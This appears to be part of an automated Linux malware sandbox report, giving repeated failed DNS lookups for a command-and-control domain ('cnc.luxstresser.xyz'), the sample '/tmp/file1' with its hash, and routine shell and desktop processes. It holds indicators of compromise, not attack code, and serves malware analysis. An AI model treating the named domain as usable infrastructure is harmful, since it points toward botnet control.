              Feb 19, 2022 16:05:39.416450024 CET8.8.8.8192.168.2.230x1533Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.442101002 CET8.8.8.8192.168.2.230x1533Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.463079929 CET8.8.8.8192.168.2.230x1533Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.485297918 CET8.8.8.8192.168.2.230x1533Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:39.508752108 CET8.8.8.8192.168.2.230x1533Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.540950060 CET8.8.8.8192.168.2.230x2028Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.560663939 CET8.8.8.8192.168.2.230x2028Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.583328962 CET8.8.8.8192.168.2.230x2028Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.602591038 CET8.8.8.8192.168.2.230x2028Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:05:50.625112057 CET8.8.8.8192.168.2.230x2028Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.654645920 CET8.8.8.8192.168.2.230xc8beName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.676268101 CET8.8.8.8192.168.2.230xc8beName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.697088003 CET8.8.8.8192.168.2.230xc8beName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.718219042 CET8.8.8.8192.168.2.230xc8beName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:01.737616062 CET8.8.8.8192.168.2.230xc8beName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.768583059 CET8.8.8.8192.168.2.230x3c5eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.788707972 CET8.8.8.8192.168.2.230x3c5eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.810834885 CET8.8.8.8192.168.2.230x3c5eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.838378906 CET8.8.8.8192.168.2.230x3c5eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:12.857975960 CET8.8.8.8192.168.2.230x3c5eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.889884949 CET8.8.8.8192.168.2.230x71e1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.909416914 CET8.8.8.8192.168.2.230x71e1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.931850910 CET8.8.8.8192.168.2.230x71e1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.955842972 CET8.8.8.8192.168.2.230x71e1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:23.977531910 CET8.8.8.8192.168.2.230x71e1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.004906893 CET8.8.8.8192.168.2.230x679eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.027568102 CET8.8.8.8192.168.2.230x679eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.048751116 CET8.8.8.8192.168.2.230x679eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.071502924 CET8.8.8.8192.168.2.230x679eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:35.093976974 CET8.8.8.8192.168.2.230x679eName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.125231028 CET8.8.8.8192.168.2.230xb4deName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.144062996 CET8.8.8.8192.168.2.230xb4deName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.166338921 CET8.8.8.8192.168.2.230xb4deName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.187544107 CET8.8.8.8192.168.2.230xb4deName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:46.209552050 CET8.8.8.8192.168.2.230xb4deName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.237962961 CET8.8.8.8192.168.2.230xb5a1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.257102013 CET8.8.8.8192.168.2.230xb5a1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.276380062 CET8.8.8.8192.168.2.230xb5a1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.295917988 CET8.8.8.8192.168.2.230xb5a1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:06:57.315114021 CET8.8.8.8192.168.2.230xb5a1Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.346147060 CET8.8.8.8192.168.2.230x7aaeName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.365721941 CET8.8.8.8192.168.2.230x7aaeName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.386511087 CET8.8.8.8192.168.2.230x7aaeName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.408355951 CET8.8.8.8192.168.2.230x7aaeName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:08.429989100 CET8.8.8.8192.168.2.230x7aaeName error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.463202000 CET8.8.8.8192.168.2.230xddb7Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.484087944 CET8.8.8.8192.168.2.230xddb7Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.506110907 CET8.8.8.8192.168.2.230xddb7Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.527411938 CET8.8.8.8192.168.2.230xddb7Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)
              Feb 19, 2022 16:07:19.547643900 CET8.8.8.8192.168.2.230xddb7Name error (3)cnc.luxstresser.xyznonenoneA (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • 127.0.0.1:80

              System Behavior

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/cat
              Arguments:cat /tmp/tmp.bhkKqn6VLL
              File size:43416 bytes
              MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/head
              Arguments:head -n 10
              File size:47480 bytes
              MD5 hash:fd96a67145172477dd57131396fc9608

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/tr
              Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
              File size:51544 bytes
              MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/cut
              Arguments:cut -c -80
              File size:47480 bytes
              MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/cat
              Arguments:cat /tmp/tmp.bhkKqn6VLL
              File size:43416 bytes
              MD5 hash:7e9d213e404ad3bb82e4ebb2e1f2c1b3

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/head
              Arguments:head -n 10
              File size:47480 bytes
              MD5 hash:fd96a67145172477dd57131396fc9608

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/tr
              Arguments:tr -d \\000-\\011\\013\\014\\016-\\037
              File size:51544 bytes
              MD5 hash:fbd1402dd9f72d8ebfff00ce7c3a7bb5

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:12
              Start date:19/02/2022
              Path:/usr/bin/cut
              Arguments:cut -c -80
              File size:47480 bytes
              MD5 hash:d8ed0ea8f22c0de0f8692d4d9f1759d3

              General

              Start time:16:05:13
              Start date:19/02/2022
              Path:/usr/bin/dash
              Arguments:n/a
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

              General

              Start time:16:05:13
              Start date:19/02/2022
              Path:/usr/bin/rm
              Arguments:rm -f /tmp/tmp.bhkKqn6VLL /tmp/tmp.RuRqJkNDuA /tmp/tmp.FX40reyTu0
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:/tmp/file1
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:n/a
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:n/a
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:n/a
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:n/a
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:n/a
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:16
              Start date:19/02/2022
              Path:/tmp/file1
              Arguments:n/a
              File size:66320 bytes
              MD5 hash:c343f34198cdb0656394f0541c3b1880

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:25
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:n/a
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:25
              Start date:19/02/2022
              Path:/usr/sbin/xfpm-power-backlight-helper
              Arguments:/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
              File size:14656 bytes
              MD5 hash:3d221ad23f28ca3259f599b1664e2427

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784

              General

              Start time:16:05:21
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76

              General

              Start time:16:05:26
              Start date:19/02/2022
              Path:/usr/bin/dbus-daemon
              Arguments:n/a
              File size:249032 bytes
              MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

              General

              Start time:16:05:26
              Start date:19/02/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
              File size:112880 bytes
              MD5 hash:4c7a0d6d258bb970905b19b84abcd8e9